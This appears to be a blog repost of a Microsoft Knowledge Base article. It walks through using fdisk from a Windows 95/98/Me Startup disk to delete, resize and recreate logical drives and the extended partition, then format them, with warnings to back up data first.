How to Repartition and Format the Extended Partition and Logical Drives of a Hard Disk
Use the steps in this section to resize or combine your extended partition and logical drives. Make sure that you have a reliable backup of any important data that you have on your extended partition and logical drives before you proceed. If you want to combine your entire hard disk in one partition, use the steps in the "How to Partition and Format a Master Hard Disk" section in this article.
How to Repartition the Extended Partition and the Logical Drives
NOTE: When you use this method, two or more partitions are left on your hard disk, a primary partition (usually drive C) and an extended partition. Even if you use the FAT32 file system, there is an 8-GB partition limitation unless you obtain a BIOS upgrade that fully supports interrupt 13 extensions. For additional information about why there is an 8-GB limit, click the article number below to view the article in the Microsoft Knowledge Base:
153550 (http://support.microsoft.com/kb/153550/EN-US/ ) Hard Disk Limited to 8-GB Partition
If you have a hard disk that is larger than 8 GB and you are not using a disk overlay program or disk management software, you need to partition and format the space that is remaining after you create each 8-GB partition:
1. Place the Startup disk in your floppy disk drive, restart your computer, and then use one of the following methods, depending on your operating system. For a Windows 98, Windows 98 Second Edition, or Windows Me Startup disk:
a. When the Microsoft Windows 98 Startup menu is displayed, select the Start computer without CD-ROM support menu option, and then press ENTER.
b. At a command prompt, type fdisk, and then press ENTER.
c. Go to step 2.
For a Windows 95 Startup disk:
d. At a command prompt, type fdisk, and then press ENTER.
e. Go to step 2.
If your hard disk is larger than 512 MB, you receive the following message:
Your computer has a disk larger than 512 MB. This version of Windows includes improved support for large disks, resulting in more efficient use of disk space on large drives, and allowing disks over 2 GB to be formatted as a single drive.
IMPORTANT: If you enable large disk support and create any new drives on this disk, you will not be able to access the new drive(s) using other operating systems, including some versions of Windows 95 and Windows NT, as well as earlier versions of Windows and MS-DOS. In addition, disk utilities that were not designated explicitly for the FAT32 file system will not be able to work with this disk. If you need to access this disk with other operating systems or older disk utilities, do not enable large drive support.
Do you wish to enable large disk support (Y/N)?
If you want to use the FAT32 file system, press Y and then press ENTER. If you want to use the FAT16 file system, press N, and then press ENTER.For additional information about the FAT32 and FAT16 file systems, click the article numbers below to view the articles in the Microsoft Knowledge Base:
118335 (http://support.microsoft.com/kb/118335/EN-US/ ) Maximum Partition Size Using FAT16 File System
154997 (http://support.microsoft.com/kb/154997/EN-US/ ) Description of the FAT32 File System
After you press ENTER, the following Fdisk Options menu is displayed:
1. Create DOS partition or Logical DOS Drive
2. Set active partition
3. Delete partition or Logical DOS Drive
4. Display partition information
5. Change current fixed disk drive
(this option is only available if you
have two physical hard disks in the computer)
Press 3, and then press ENTER. The following menu is displayed:
1. Delete Primary DOS Partition
2. Delete Extended DOS Partition
3. Delete Logical DOS Drive(s) in the Extended DOS Partition
4. Delete Non-DOS Partition
Press 3, and then press ENTER.
The Delete Logical DOS Drive(s) in the Extended DOS Partition screen is displayed with a chart that describes the attributes of your hard disk, as shown in the following example.
Collapse this tableExpand this table
Drv Volume Label Mbytes System Usage
D: (User Defined) 2047 FAT16 100%
E: (User Defined) 2047 FAT16 100%
F: (User Defined) 2047 FAT16 100%
G: (User Defined) 2047 FAT16 100%
H: (User Defined) 2047 FAT32 17%
I: (User Defined) 1498 UNKNOWN 13%
Total Extended DOS Partition size is XXX Mbytes (1 MByte = 1048576 bytes).
WARNING! Data in a deleted Logical DOS Drive will be lost.
What drive do you want to delete? Type the letter for the drive that you want to delete, and then press ENTER.
When you are prompted to type the volume label for the drive, type the volume label if the drive has a volume label.
NOTE: You must type the exact label or press ENTER if there is no volume label. If you type an incorrect label name, you receive the following message:
Volume label does not match.
Enter Volume Label?
If you type the correct volume label, you receive the following message:
Are you sure (Y/N)?
The default answer to this message is N. You must press Y, and then press ENTER to delete the drive. The words "Drive deleted" are displayed in the chart next to the drive letter that you deleted.
Repeat steps 3 through 7 until you have deleted all of the drives that you want to delete. When you are finished, press ESC. If you remove all of the logical drives, you receive a "No logical drives defined" message and a chart of drive letters that you changed or deleted. Press ESC to continue.
NOTE: If you want to resize the logical drive or drives by making them larger or smaller, do this now. If you want to remove the extended partition, view step 11.
Press 1 to select the Create DOS partition or Logical DOS Drive menu option from the Fdisk Options menu, press 3 to select the Create Logical DOS Drive(s) in the Extended DOS Partition menu option from the Create DOS Partition or Logical DOS Drive menu, and then press ENTER. When you do this, you receive a "Verifying drive integrity" message with a percentage-complete counter.
NOTE: When you use this step, the extended partition is not deleted, only the logical drive or drives in the extended partition are deleted. You do not need to remove the extended partition to resize the logical drives. For example, if you have one logical drive in the extended partition and you want to make two logical drives, delete the logical drive and create two logical drives in the extended partition first. Note that you are still limited to the total space in the extended partition.
After the drive verification procedure is finished, you receive the following message:
Total Extended DOS Partition size is XXX Mbytes (1 MByte = 1048576 bytes)
Maximum space available for logical drive is XXX Mbytes (X%)
Enter logical drive size in Mbytes or percent of disk space (%).
The "maximum Mbytes available" is the default size, however, you can change the number if you type the number for the partition size that you want to create, and then pressing ENTER. Press ESC, press ESC to quit the Fdisk tool and return to a command prompt, and then view step 11.
If you want to remove the extended MS-DOS partition, press ESC to return to the Fdisk Options menu. Press 3 to select the Delete DOS Partition or Logical DOS Drive menu option, press ENTER, press 2 to select the Delete Extended DOS Partition menu option, and then press ENTER.
The screen shows the current fixed disk drive and information about it. The extended partition is listed in the Type column. For example:
Partition Status Type Volume Label Mbytes System Usage
C: 1 A PRI DOS (your label) 1200 FAT16 50%
2 EXT DOS (your label) 1200 UNKNOWN 50%
Total disk space is 2400 Mbytes (1 Mbyte = 1048576 bytes)
You also receive the following warning message:
WARNING! Data in the deleted Extended DOS Partition will be lost.
Do you wish to continue (Y/N)?
Press Y, and then press ENTER to delete the partition. You receive the following message:
Extended DOS Partition deleted
Press ESC to continue
NOTE: If you try to delete your extended MS-DOS partition before you remove all of the logical drives, you receive the following error message:
Cannot delete Extended DOS Partition while logical drives exist.
If you receive this error message, repeat steps 3 through 6, and then follow steps 9 and 10 to delete the extended MS-DOS partition.
The Fdisk Options menu is displayed. If you leave disk space unpartitioned on your hard disk, Windows may not display the full size of your hard disk, only the amount of space that is available.
IMPORTANT: After you change the Fdisk options or delete partitions, the data that was on the partition is deleted and cannot be retrieved. Be very sure that you understand this procedure before you attempt to follow it. If you want to start with a clean configuration or if you want to redo your current configuration, back up everything that is important to you before you use the Fdisk tool.
If you want to use the unpartitioned space on your hard disk, you must format the drives. When you successfully run the Format.com utility, you receive the following message:
WARNING, ALL DATA ON NON-REMOVABLE DISK DRIVE X: WILL BE LOST!
Proceed with Format (Y/N)?
Press Y, and then press ENTER to format the drive.
After the format procedure is finished, you receive the following message:
Volume label (11 characters, ENTER for none)?
NOTE: This is an optional feature that you can use to type a name for the hard disk. You can either type an 11-character name for the drive, or leave it blank and press ENTER.
Subscribe to:
Posts (Atom)